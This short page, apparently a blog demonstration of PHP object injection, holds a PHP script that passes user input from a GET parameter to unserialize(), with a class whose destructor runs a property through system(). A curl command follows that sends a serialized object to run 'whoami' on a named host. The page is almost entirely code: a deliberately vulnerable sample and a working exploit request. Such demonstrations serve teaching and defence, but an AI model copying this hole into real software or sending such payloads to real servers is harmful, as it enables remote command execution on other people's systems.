About
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
//whoami.php
class About
{
public $command = null;
public function me()
{
return;
}
public function __destruct()
{
if ($this->command) {
system($this->command);
}
}
}
$payload = $_GET['data'] ?? '';
unserialize($payload);
$about = new About;
$about->me();
1
2
3
curl -X GET -G \
--data 'data=O:5:%22About%22:1:{s:7:%22command%22;s:6:%22whoami%22;}' \
'https://mukarramkhalid.com/whoami.php'